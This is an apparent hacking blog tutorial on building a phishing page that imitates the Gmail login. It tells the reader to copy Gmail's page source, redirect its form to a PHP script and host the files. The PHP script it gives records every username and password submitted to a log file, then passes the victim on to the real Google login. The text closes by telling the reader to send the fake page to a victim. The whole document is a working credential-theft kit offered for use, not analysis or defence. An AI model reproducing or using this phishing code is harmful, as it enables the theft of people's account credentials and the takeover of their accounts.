Phishing is a popular and dangerous hacking technique to steal the confidential information of the people using fake login pages. In this article i m going to show you how to create your own fake login pages for any website.
Before reading this article you need to know the basic concept of phishing. If you are new to phishing, i recommend you to know the basics.
You can read them from here.
What is phishing.
To perform phishing attack, you need to create three files they are
1) .html
2) .php
3) .txt
Procedure:
Step 1:
Open the website for which you want to create a fake login page. In my case it is gmail.
Follow the steps carefully.
Give a right click and then select “view page source”.
It opens the source code of the page.
Now copy the entire code by pressing CTRL+A and paste it in your notepad.
and press CTRL+F at your notepad. It opens a search box. There enter the word “action”.
Now it shows the word “action” by highlighting it.
Here again follow the steps carefully.
Delete everything within the double quotes.
It means https://accounts.google.com/ServiceLoginAuth should be deleted.
And replace it with “mail.php”
And change the word “post” to “get” as shown in the figure.
Now save it as "gmail.html".
Your fake login page is ready.
Now you need to create the file “mail.php”
Just copy the following code in your notepad and save it as “mail.php”
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 3:
create an empty notepad file and save it as “log.txt”.
Now upload these 3 files onto your free webhosting site and then change the permissions of your log.txt file to 777.
Thats it. You are done. Now you can send your fake login page to your victim.
Hope you liked it.. Feel free to comment.